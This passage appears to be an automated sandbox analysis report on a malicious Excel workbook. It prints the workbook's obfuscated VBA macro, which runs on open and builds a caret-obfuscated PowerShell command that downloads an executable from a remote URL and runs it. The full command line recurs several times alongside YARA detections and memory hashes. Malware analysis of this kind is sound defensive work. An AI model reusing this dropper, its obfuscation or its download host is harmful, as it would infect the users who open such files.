                  MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:false

                  Target ID:2
                  Start time:09:09:23
                  Start date:31/10/2024
                  Path:C:\Windows\System32\cmd.exe
                  Wow64 process (32bit):false
                  Commandline:cMD.exe /c "p^Ow^ERS^hel^l^.e^x^e^ -nO^l -No^Ni^Nt^ -W^InDO^ws^ 1 -NoprO^FIle^ -eX^Ec^U B^Ypa^S^s $fos=''',''';$hit='dfil';$fd=');sta';$dr='(ne';$ed='ject ';$ipo='syst';$kos='t.we';$rem='ent).do';$sad='wnloa';$kp='w-ob';$nim='e(''';$mo='a';$uy='nlj';$ji='mo.ex';$pol='em.ne';$oe='e''';$jik='rt-pro';$naw='cess ''';$lim='bcli';Invoke-Expression($dr+$kp+$ed+$ipo+$pol+$kos+$lim+$rem+$sad+$hit+$nim+'https://futanostra.win/foglio.ful'+$fos+$mo+$uy+$ji+$oe+$fd+$jik+$naw+$mo+$uy+$ji+$oe)"
                  Imagebase:0x4ac80000
                  File size:345'088 bytes
                  MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: SUSP_PowerShell_Caret_Obfuscation_2, Description: Detects powershell keyword obfuscated with carets, Source: 00000002.00000002.412257968.0000000000320000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth
                  • Rule: SUSP_PowerShell_Caret_Obfuscation_2, Description: Detects powershell keyword obfuscated with carets, Source: 00000002.00000002.412257968.000000000035E000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth
                  • Rule: JoeSecurity_ObfuscatedPowershell, Description: Yara detected Obfuscated Powershell, Source: 00000002.00000002.412250161.0000000000294000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: SUSP_PowerShell_Caret_Obfuscation_2, Description: Detects powershell keyword obfuscated with carets, Source: 00000002.00000002.412250161.0000000000294000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth
                  Reputation:high
                  Has exited:true

                  Target ID:4
                  Start time:09:09:24
                  Start date:31/10/2024
                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  Wow64 process (32bit):false
                  Commandline:pOwERShell.exe -nOl -NoNiNt -WInDOws 1 -NoprOFIle -eXEcU BYpaSs $fos=''',''';$hit='dfil';$fd=');sta';$dr='(ne';$ed='ject ';$ipo='syst';$kos='t.we';$rem='ent).do';$sad='wnloa';$kp='w-ob';$nim='e(''';$mo='a';$uy='nlj';$ji='mo.ex';$pol='em.ne';$oe='e''';$jik='rt-pro';$naw='cess ''';$lim='bcli';Invoke-Expression($dr+$kp+$ed+$ipo+$pol+$kos+$lim+$rem+$sad+$hit+$nim+'https://futanostra.win/foglio.ful'+$fos+$mo+$uy+$ji+$oe+$fd+$jik+$naw+$mo+$uy+$ji+$oe)
                  Imagebase:0x13ff20000
                  File size:443'392 bytes
                  MD5 hash:A575A7610E5F003CC36DF39E07C4BA7D
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:moderate
                  Has exited:true

                  Call Graph

                  Module: Foglio1

                  Declaration
                  Line | Content
                  1 | Attribute VB_Name = "Foglio1"
                  2 | Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                  3 | Attribute VB_GlobalNameSpace = False
                  4 | Attribute VB_Creatable = False
                  5 | Attribute VB_PredeclaredId = True
                  6 | Attribute VB_Exposed = True
                  7 | Attribute VB_TemplateDerived = False
                  8 | Attribute VB_Customizable = True

                  Module: ThisWorkbook

                  Declaration
                  Line | Content
                  1 | Attribute VB_Name = "ThisWorkbook"
                  2 | Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
                  3 | Attribute VB_GlobalNameSpace = False
                  4 | Attribute VB_Creatable = False
                  5 | Attribute VB_PredeclaredId = True
                  6 | Attribute VB_Exposed = True
                  7 | Attribute VB_TemplateDerived = False
                  8 | Attribute VB_Customizable = True

                  APIs | Meta Information
                  xlSecondary |
                  Shell | Shell("cMD.exe /c "p^Ow^ERS^hel^l^.e^x^e^ -nO^l -No^Ni^Nt^ -W^InDO^ws^ 1 -NoprO^FIle^ -eX^Ec^U B^Ypa^S^s $fos=''',''';$hit='dfil';$fd=');sta';$dr='(ne';$ed='ject ';$ipo='syst';$kos='t.we';$rem='ent).do';$sad='wnloa';$kp='w-ob';$nim='e(''';$mo='a';$uy='nlj';$ji='mo.ex';$pol='em.ne';$oe='e''';$jik='rt-pro';$naw='cess ''';$lim='bcli';Invoke-Expression($dr+$kp+$ed+$ipo+$pol+$kos+$lim+$rem+$sad+$hit+$nim+'https://futanostra.win/foglio.ful'+$fos+$mo+$uy+$ji+$oe+$fd+$jik+$naw+$mo+$uy+$ji+$oe)"",0) -> 3588

                  Line | Instruction | Meta Information
                  10 | Sub Workbook_Open() |
                  11 | If xlSecondary > 0 Then | xlSecondary; executed
                  12 | nailscopper = zygotas |
                  13 | Shell nailscopper & glientveiuun, 0 | Shell("cMD.exe /c "p^Ow^ERS^hel^l^.e^x^e^ -nO^l -No^Ni^Nt^ -W^InDO^ws^ 1 -NoprO^FIle^ -eX^Ec^U B^Ypa^S^s $fos=''',''';$hit='dfil';$fd=');sta';$dr='(ne';$ed='ject ';$ipo='syst';$kos='t.we';$rem='ent).do';$sad='wnloa';$kp='w-ob';$nim='e(''';$mo='a';$uy='nlj';$ji='mo.ex';$pol='em.ne';$oe='e''';$jik='rt-pro';$naw='cess ''';$lim='bcli';Invoke-Expression($dr+$kp+$ed+$ipo+$pol+$kos+$lim+$rem+$sad+$hit+$nim+'https://futanostra.win/foglio.ful'+$fos+$mo+$uy+$ji+$oe+$fd+$jik+$naw+$mo+$uy+$ji+$oe)"",0) -> 3588; executed
                  14 | Endif |
                  15 | End Sub |

                  APIs | Meta Information
                  Part of subcall function magaraje@ThisWorkbook: Array
                  Part of subcall function magaraje@ThisWorkbook: Now
                  Part of subcall function magaraje@ThisWorkbook: Chr
                  Part of subcall function magaraje@ThisWorkbook: Array
                  Part of subcall function magaraje@ThisWorkbook: Now
                  Part of subcall function magaraje@ThisWorkbook: Minute
                  Part of subcall function magaraje@ThisWorkbook: Second
                  Part of subcall function magaraje@ThisWorkbook: Timer
                  Part of subcall function magaraje@ThisWorkbook: Hour
                  Part of subcall function tuplook@ThisWorkbook: Array
                  Part of subcall function tuplook@ThisWorkbook: Array
                  Part of subcall function tuplook@ThisWorkbook: Array
                  Part of subcall function tuplook@ThisWorkbook: Second
                  Part of subcall function tuplook@ThisWorkbook: Now
                  Part of subcall function tuplook@ThisWorkbook: Array
                  Part of subcall function tuplook@ThisWorkbook: Array
                  Part of subcall function tuplook@ThisWorkbook: Array

                  Strings | Decrypted Strings
                  "/c """

                  Line | Instruction | Meta Information
                  76 | Function zygotas() |
                  77 | tuumnote = galvolero | executed
                  78 | seneglrive = "/c """ |
                  79 | zygotas = magaraje + "e" + " " + " " + seneglrive + tuplook + tuumnote |
                  80 | End Function |

                  APIs | Meta Information
                  Array
                  Array
                  Array
                  Second
                  Now
                  Array
                  Array
                  Array

                  Strings | Decrypted Strings
                  "^he""l^""l"""
                  "^""U"
                  " "
                  "^Ec"""
                  "^E""R""S"""
                  "w"""
                  """O"
                  "p""^"

                  Line | Instruction | Meta Information
                  49 | Function tuplook() |
                  50 | bobsleys = Array(Null, Null, Null, 1, "^he" + "l^" + "l" + "", 0, Null, Null, Null, Null, Null, Null, 0, Null, Null, Null) | Array; executed
                  51 | regpistol = Array(Null, Null, Null, 1, Null, Null, Null, Null, Null, Null, Null, Null, Null, "^" + "U", Null, Null) | Array
                  52 | intertvn = Array(Null, " ", Null, Second(Now), Null, Second(Now), "^Ec" + "", Null, Null, Second(Now), Null, Null, Null, Null, Null, Null, Null, Second(Now)) | Array; Second; Now
                  53 | caprureflags = Array(Null, Null, 1, "^E" + "R" + "S" + "", Null, Null, Null, Null, 0, Null, Null, 0, Null, Null, 0, Null) | Array
                  54 | neelwater = Array(Null, 1, Null, Null, Null, 0, Null, Null, Null, "w" + "", Null, Null, Null, Null, Null, Null, Null) | Array
                  55 | tooool = "" & "O" |
                  56 | tuplook = "p" + "^" + tooool + Array(neelwater(9) + caprureflags(3) + bobsleys(4) + poltergeystore + " -N" + "o" + vangafoot(12) + "I" + "l" + "e^" + footballr + "X" + intertvn(6) + regpistol(13) & chivasgoa)(0) | Array
                  57 | End Function |

                  APIsMeta Information

                  Array

                  Now

                  Chr

                  Array

                  Now

                  Minute

                  Second

                  Timer

                  Hour

                  StringsDecrypted Strings
                  "e"
                  ""c"M"
                  "D""."
                  LineInstructionMeta Information
                  22

                  Function magaraje()

                  23

                  madagaskarus = "e"

                  executed
                  24

                  harddisks = Array(Null, Now(), Null, Now(), Null, Now(), Now(), Null, "c" + Chr(77), Now(), Now(), Now(), Now(), Null, Null)

                  Array

                  Now

                  Chr

                  25

                  tupertup = Array(Now(), Minute(Now), Second(Now), Now(), Timer(), "D" + "." & madagaskarus + "x", Timer(), Hour(Now), Timer(), Timer(), Timer(), Now())

                  Array

                  Now

                  Minute

                  Second

                  Timer

                  Hour

                  26

                  magaraje = harddisks(8) & tupertup(5)

                  27

                  End Function

                  APIsMeta Information

                  Array

                  Now

                  Array

                  Now

                  Array

                  Now

                  StringsDecrypted Strings
                  "s """
                  "p""a^"""
                  "A"""
                  "Y"
                  " ""B^"
                  LineInstructionMeta Information
                  43

                  Function chivasgoa()

                  44

                  singhh = Array(Null, Null, Null, Now(), Null, Now(), Null, Now(), Null, "s " + "", Null, Now(), Null, Null, Null, Null)

                  Array

                  Now

                  executed
                  45

                  deepip = Array(Null, Now(), Null, Null, Null, Null, Null, Null, Now(), Null, Null, Null, "p" + "a^" + "", Null, Null, Null)

                  Array

                  Now

                  46

                  yehopol = Array(Now(), Null, "Y", Now(), Now(), Now(), Null, Null, "A" + "", Now(), Null, Now(), Null, Null, Null, Null, Null, Null)

                  Array

                  Now

                  47

                  chivasgoa = " " + "B^" + yehopol(2) + deepip(12) + "S^" + singhh(9)

                  48

                  End Function

                  APIsMeta Information

                  Array

                  Array

                  Array

                  Chr

                  StringsDecrypted Strings
                  "D"
                  "s""""^ 1"""
                  " -""W^""I""n"""
                  "-n""O^"""
                  "^N""i^N""t"""
                  "^.""e"
                  LineInstructionMeta Information
                  36

                  Function poltergeystore()

                  37

                  hhneg = "D"

                  executed
                  38

                  valeygod = Array(Null, Null, Null, Null, Null, 1, Null, Null, Null, 1, Null, Null, "s" + "" + "^ 1" + "", Null, Null, Null, Null, Null)

                  Array

                  39

                  ganovey = Array(Null, Null, 1, " -" + "W^" & "I" + "n" & "", Null, 0, Null, Null, Null, Null, "-n" + "O^" + "", Null, Null, Null, Null, Null)

                  Array

                  40

                  poolnum = Array(Null, Null, Null, 1, Null, 0, Null, Null, Null, Null, Null, Null, Null, Null, 1, "^N" + "i^N" + "t" + "", 0)

                  Array

                  41

                  poltergeystore = "^." + "e" & molibdensefe & ganovey(10) + "l " + "-No" + poolnum(15) + Chr(94) & ganovey(3) & hhneg + "O^w" + valeygod(12)

                  Chr

                  42

                  End Function

                  APIsMeta Information

                  Array

                  Now

                  Minute

                  Second

                  Hour

                  Timer

                  StringsDecrypted Strings
                  "O"
                  "p""r"
                  LineInstructionMeta Information
                  32

                  Function vangafoot()

                  33

                  zeebdd = "O"

                  executed
                  34

                  vangafoot = Array(Now(), Now(), Now(), Now(), Now(), Now(), Now(), Minute(Now), Second(Now), Minute(Now), Second(Now), Second(Now), "p" + "r" + zeebdd + "^" + "F", Now(), Hour(Now), Timer(), Now())

                  Array

                  Now

                  Minute

                  Second

                  Hour

                  Timer

                  35

                  End Function

                  APIsMeta Information

                  Part of subcall function maltibalo@ThisWorkbook: Randomize

                  Part of subcall function maltibalo@ThisWorkbook: Space

                  Part of subcall function maltibalo@ThisWorkbook: Chr

                  Part of subcall function maltibalo@ThisWorkbook: Int

                  Part of subcall function maltibalo@ThisWorkbook: Rnd

                  StringsDecrypted Strings
                  "$fos=''""',''';$h""it='d""f""il';$""fd=""');s""ta';$dr='(ne';$ed""='j""ect '"";$ipo=""'syst';$""kos='t.we';$rem='e""nt).do';$sad"
                  LineInstructionMeta Information
                  18

                  Function galvolero()

                  19

                  galvolero = "$fos=''" + "',''';$h" + "it='d" + "f" + "il';$" + "fd=" + "');s" + "ta';$dr='(ne';$ed" + "='j" + "ect '" + ";$ipo=" + "'syst';$" + "kos='t.we';$rem='e" + "nt).do';$sad"

                  executed
                  20

                  galvolero = galvolero + "='wn" + "l" + "oa';$kp" + "='w-" + "ob'" + ";$nim='e(''" + "';$mo='" + "a" + "';$" + "uy='" + maltibalo(3) + "';$ji" + "='" + maltibalo(2) + ".e" + "x';$po" + "l='em." + "ne';$oe='e''';$jik='rt-p" + "ro';$naw='c" + "ess ''';$lim='bc" + "li';I" + "nv" + "oke-E" + "xp" + "ression($dr+$kp+$ed+$ipo+$pol+$kos+$lim+$rem+$sad+$hit+$nim+'https://futanostra.win/foglio.ful'+$fos+$mo+$uy+$ji+$oe+$fd+$jik+$naw+$mo+$uy+$ji+$oe)"

                  21

                  End Function

                  APIsMeta Information

                  Randomize

                  Space

                  Chr

                  Int

                  Rnd

                  LineInstructionMeta Information
                  58

                  Function maltibalo(LenLetter as Integer)

                  59

                  Randomize

                  Randomize

                  executed
                  60

                  maltibalo = Space(LenLetter)

                  Space

                  61

                  For iCount% = 1 To LenLetter

                  62

                  Mid (maltibalo, iCount%, 1) = Chr((Int(97 + (Rnd() * 26))))

                  Chr

                  Int

                  Rnd

                  63

                  Next

                  64

                  End Function

                  StringsDecrypted Strings
                  "^""x"
                  LineInstructionMeta Information
                  65

                  Function molibdensefe()

                  66

                  deopooter = "^" + "x"

                  executed
                  67

                  molibdensefe = deopooter + "^e" + "^" + " "

                  68

                  End Function

                  StringsDecrypted Strings
                  """ "
                  LineInstructionMeta Information
                  72

                  Function footballr()

                  73

                  nubic = "" + " "

                  executed
                  74

                  footballr = nubic + "-" + "e"

                  75

                  End Function

                  StringsDecrypted Strings
                  """"""
                  LineInstructionMeta Information
                  69

                  Function glientveiuun()

                  70

                  glientveiuun = """" + ""

                  executed
                  71

                  End Function

                  StringsDecrypted Strings
                  "t"
                  LineInstructionMeta Information
                  28

                  Function enchteinerdom()

                  29

                  enchteinerdom = "t"

                  30

                  enchteinerdom = enchteinerdom + "h"

                  31

                  End Function

                    Memory Dump Source
                    • Source File: 00000004.00000002.411691291.000007FE8B610000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE8B610000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_7fe8b610000_powershell.jbxd
                    Similarity
                    • Opcode ID: 3df473024f871f31ba644091f335335a413b8449fa59fc8777286c8ab23865d0
                    • Instruction ID: a08e55e903795bb50ae8e32e3e37c0faf74e77800fbcb3f40c6d456385b8b539
                    • Opcode Fuzzy Hash: 3df473024f871f31ba644091f335335a413b8449fa59fc8777286c8ab23865d0
                    • Instruction Fuzzy Hash: 67D1B02191E7C50FE34BA73C58652B57FE2DF47254F2901EBD48ECB1A3D918981AC362
                    Memory Dump Source
                    • Source File: 00000004.00000002.411691291.000007FE8B610000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE8B610000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_7fe8b610000_powershell.jbxd
                    Similarity
                    • Opcode ID: 09098d17a755065768ce27752fe66ea56e084fe7e351da1f6db467922f0665c7
                    • Instruction ID: 43e13427276610a4f2c43cd7d28c5dc2aa50d85ccba03366a719ba295e9f03f4
                    • Opcode Fuzzy Hash: 09098d17a755065768ce27752fe66ea56e084fe7e351da1f6db467922f0665c7
                    • Instruction Fuzzy Hash: E2D1023050E7C91FE757A73C98546B5BFA4EF87260B1901EBD0CDCB1A3D618A816C3A2
                    Memory Dump Source
                    • Source File: 00000004.00000002.411691291.000007FE8B610000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE8B610000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_7fe8b610000_powershell.jbxd
                    Similarity
                    • Opcode ID: c141745b3b06730025d168f5d85b656f6b94cd81eda64f82fa95f3732cf02632
                    • Instruction ID: 275b9e26a43097c981a28824526dd68ba15e707a17a2cac083fe507339a8f38e
                    • Opcode Fuzzy Hash: c141745b3b06730025d168f5d85b656f6b94cd81eda64f82fa95f3732cf02632
                    • Instruction Fuzzy Hash: A4A1582050EBCA1FE743977C98246A27FF1EF4B254F1901EBD48DCB1A3D618991AC362